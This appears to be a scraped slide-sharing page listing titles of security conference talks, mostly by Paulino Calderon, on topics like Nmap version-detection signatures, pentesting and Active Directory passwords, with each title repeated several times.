Escribiendo firmas para el sistema de detección de versiones de Nmap
Escribiendo firmas para el sistema de detección de versiones de NmapEscribiendo firmas para el sistema de detección de versiones de Nmap
Escribiendo firmas para el sistema de detección de versiones de Nmap
 
El porqué está fallando tu programa de seguridad informática por Paulino Cald...
El porqué está fallando tu programa de seguridad informática por Paulino Cald...El porqué está fallando tu programa de seguridad informática por Paulino Cald...
El porqué está fallando tu programa de seguridad informática por Paulino Cald...
 
Pwning corporate networks in a single day by Paulino Calderon Pale
Pwning corporate networks in a single day by Paulino Calderon PalePwning corporate networks in a single day by Paulino Calderon Pale
Pwning corporate networks in a single day by Paulino Calderon Pale
 
CPMX7 Pwneando redes informáticas por Paulino Calderon
CPMX7 Pwneando redes informáticas por Paulino CalderonCPMX7 Pwneando redes informáticas por Paulino Calderon
CPMX7 Pwneando redes informáticas por Paulino Calderon
 
Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...
Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...
Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...
 
Explotación práctica de señales de radio por Luis Colunga
Explotación práctica de señales de radio por Luis ColungaExplotación práctica de señales de radio por Luis Colunga
Explotación práctica de señales de radio por Luis Colunga
 
Pentesting 101 por Paulino Calderon
Pentesting 101 por Paulino CalderonPentesting 101 por Paulino Calderon
Pentesting 101 por Paulino Calderon
 
Obtener contraseñas del directorio activo por hkm
Obtener contraseñas del directorio activo por hkmObtener contraseñas del directorio activo por hkm
Obtener contraseñas del directorio activo por hkm
 
OSINT vs CIBERCRIMEN por nickops
OSINT vs CIBERCRIMEN por nickopsOSINT vs CIBERCRIMEN por nickops
OSINT vs CIBERCRIMEN por nickops
 
Recuperacion de defaces con versionador Git por Alevsk
Recuperacion de defaces con versionador Git por Alevsk Recuperacion de defaces con versionador Git por Alevsk
Recuperacion de defaces con versionador Git por Alevsk
 
Seguridad en Bitcoin por Luis Daniel Beltran
Seguridad en Bitcoin por Luis Daniel BeltranSeguridad en Bitcoin por Luis Daniel Beltran
Seguridad en Bitcoin por Luis Daniel Beltran
 
CPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto SalgadoCPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto Salgado
 
CPMX5 - Las nuevas generaciones de redes por Luis Colunga
CPMX5 - Las nuevas generaciones de redes por Luis ColungaCPMX5 - Las nuevas generaciones de redes por Luis Colunga
CPMX5 - Las nuevas generaciones de redes por Luis Colunga
 

Drive by subdomain router pharming (2012)